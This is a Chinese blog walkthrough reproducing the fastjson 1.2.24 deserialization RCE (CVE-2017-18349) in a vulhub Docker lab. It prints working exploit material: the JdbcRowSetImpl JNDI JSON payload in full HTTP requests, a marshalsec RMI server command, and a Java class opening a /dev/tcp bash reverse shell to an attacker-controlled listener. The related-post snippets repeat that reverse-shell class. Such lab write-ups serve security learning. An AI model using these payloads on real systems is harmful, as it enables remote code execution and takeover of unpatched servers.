fastjson 1.2.24 反序列化 RCE 漏洞复现(CVE-2017-18349)

已于 2022-04-23 13:27:25 修改
阅读量6.2k 收藏 12
点赞数 12
分类专栏: Web安全 漏洞挖掘 安全 文章标签: 安全 web安全 系统安全
于 2022-04-23 12:58:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BrickLoveStudy/article/details/124362374
版权

文章目录

fastjson 1.2.24 反序列化 RCE 漏洞复现(CVE-2017-18349)

fastjson 1.2.24 反序列化导致任意命令执行漏洞

前置环境

  1. kali虚拟机,安装好docker,docker-compose
  2. 宿主机,安装配置好java,python环境
  3. 虚拟机用NAT网卡模式,可以与宿主机互相通信(可以ping通)

漏洞环境搭建

  1. 在kali虚拟机中,利用vulhub的docker镜像快速搭建。
  2. 下载 git clone https://github.com/vulhub/vulhub或者直接下载zip文件
  3. 进入vulhub文件目录, 再cd fastjson/1.2.24-rce
  4. 启动docker镜像,sudo docker-compose up -d,启动好输入sudo docker ps,看是否成功启动
    在这里插入图片描述
  5. 安装好后,输入ifconfig指令,查看虚拟机ip,此时在宿主机访问http://虚拟机ip:8090,可以看到json格式输出
    在这里插入图片描述
    在这里插入图片描述

漏洞复现

都是在宿主机(攻击机)进行操作。

  1. 使用com.sun.rowset.JdbcRowSetImpl的利用链,通过 JNDI 注入来执行命令
  2. 先编译上传命令执行代码,新建 TouchFile.java
// TouchFile.java
// cmd run javac TouchFile.java 
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
// do nothing
        }
    }
}

  1. 打开终端cmd执行javac TouchFile.java编译,此时生成TouchFile.class文件

  2. 利用python快速启动临时web服务(ps.省事),python -m http.server 8888
    在这里插入图片描述

  3. 利用marshalsec工具(需要maven环境编译),或者直接下载marshalsec-0.0.3-SNAPSHOT-all.jar 链接: https://pan.baidu.com/s/1pDaDDKWD1VmTAmlnQMB-6Q?pwd=rv7u 提取码: rv7u

  4. 通过java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://宿主机ip:8888/#TouchFile 2335启动RMI服务器,监听2335 端口,并指定加载远程类 TouchFile.class在这里插入图片描述

  5. 利用burpsuite向kali虚拟机靶场发送payload,带上RMI地址,可以看到上图的RMI服务已经发送了TouchFile

POST / HTTP/1.1
Host: 192.168.132.128:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.31.41:2335/TouchFile",
        "autoCommit":true
    }
}

在这里插入图片描述

  1. 进入虚拟机,sudo docker ps查看容器id,执行sudo docker exec -it a08916637ab9 bash进入容器,执行ls /tmp,查看到,我们成功创建了success文件

获取webshell

  1. 道理同上,创建shell.java,并执行javac shell.java进行编译
import java.lang.Runtime;
import java.lang.Process;
public class shell{
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","exec 5<>/dev/tcp/宿主机ip/19527;cat <&5 | while read line; do $line 2>&5 >&5; done"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
  1. 将marshalsec指定文件改成shell
    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://宿主机ip:8888/#shell 2335
  2. 下载一个netcat,https://eternallybored.org/misc/netcat/,在本地监听19527端口。.\nc.exe -lvvp 19527
  3. 利用BurpSuite发送payload
POST / HTTP/1.1
Host: 192.168.132.128:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 163
 

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.31.41:2335/shell",
        "autoCommit":true
    }
}

在这里插入图片描述

  1. 成功获得root权限,执行whoami
    在这里插入图片描述
GeekCoderBrick
关注
  • 12
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 15
    评论
专栏目录
Fastjson1.2.24-RCECVE-2017-18349
aetlypdlg_ys的博客
05-12 868
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。
Fastjson 1.2.24 反序列化导致任意命令执行漏洞复现CVE-2017-18349
Welcome To Myon'Blog !
03-09 2007
Fastjson 是一个 Java 库,用于在 Java 对象和 JSON 数据之间进行转换,它提供了一种简单而高效的方式来序列化 Java 对象为 JSON 格式的字符串,以及将 JSON 字符串反序列化为 Java 对象。Fastjson 支持各种类型的 Java 对象,包括预先存在但没有源代码的对象。
Fastjson漏洞CVE-2017-18349
GalaxySpaceX的博客
05-20 1155
Fastjson漏洞CVE-2017-18349
Fastjson 1.2.24 反序列化CVE-2017-18349
黑白的博客
11-23 3370
声明 好好学习,天天向上 漏洞描述 CVE-2017-18349,前台无回显RCE fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 影响范围 fastjson<=1.2.24 复现过程 这里使用1.2.24版本 使用vulhub cd /app/vulhub-20201028/fastjson/1.2.24-rce 使用docker启动 docker-compose
fastjson反序列化漏洞(CVE-2017-18349)
rumil的博客
09-19 495
fastjson中,在反序列化的时候 jdk中 的 jdbcRowSetImpl 类一定会被执行,我们给此类中的 setDataSourcesName 输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞。它没有用java的序列化机制,而是自定义了一套序列化机制。"JSON.toJSONString"是Java语言中com.alibaba.fastjson.JSON类提供的一个方法,用于将Java对象转换为JSON格式的字符串。
fastjson1.2.24 反序列化导致任意命令执行漏洞CVE-2017-18349
1ance's blog
07-24 1504
CVE-2017-18349漏洞原理 漏洞原理
fastjson 1.2.24 反序列化导致任意命令执行漏洞CVE-2017-18349
qq_51163834的博客
06-24 786
fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。
fastjson1.2.24反序列化RCE
最新发布
06-24
然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本中存在安全风险,其中之一便是“Fastjson 1.2.24反序列化RCE漏洞。这个漏洞允许攻击者通过精心构造的JSON输入,在目标系统上执行任意代码,从而可能...
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
主要介绍了SpringBoot Redis配置Fastjson进行序列化和反序列化实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
fastjson-1.2.24
04-24
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
Fastjson代码执行漏洞 [CVE-2022-25845].md
07-09
Fastjson代码执行漏洞 [CVE-2022-25845]
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3033
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
Fastjson1.2.24反序列化导致任意命令执行(CVE-2017-18349)
m0_58596609的博客
01-05 1384
Fastjson1.2.24反序列化导致任意命令执行(CVE-2017-18349) 超详细
Fastjson1.2.24RCE漏洞复现
L1928的博客
05-18 866
1.启动环境并且访问 2.下载marshalsec-0.0.3-SNAPSHOT-all.jar 3.新建Shell.java文件 import java.lang.Runtime; import java.lang.Process; public class shell{ static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.
fastjson复现-详细
赵花花08042的博客
11-11 3086
https://vulhub.org/#/environments/fastjson/1.2.24-rce/ http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/ https://www.freebuf.com/vuls/208339.
Fastjson反序列化漏洞分析
热门推荐
fly小灰灰的专栏
07-30 1万+
1. 漏洞描述 漏洞简述: 2017年3月15日,fastjson官方主动爆出fastjson1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 影响版本: fastjson <= 1.2.24 2. 漏洞简介  java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastj
fastjson 1.2.24反序列化导致任意命令执行漏洞分析记录
爱无止
11-25 2239
环境搭建:小说搜索 shupu.org 漏洞影响版本: fastjson1.2.24以及之前版本存在远程代码执行高危安全漏洞 环境地址: https://github.com/vulhub/vulhub/tree/master/fastjson/vuln 正常访问页面返回hello,world~ 此时抓包修改content-type为json格式,并post payload,即可执...
fastjson 1.2.24 反序列化导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在反序列化漏洞,攻击者可以利用该漏洞执行任意命令。该漏洞的原因是 fastjson反序列化时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议用户尽快升级 fastjson 版本,或者采取其他安全措施来防范该漏洞的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值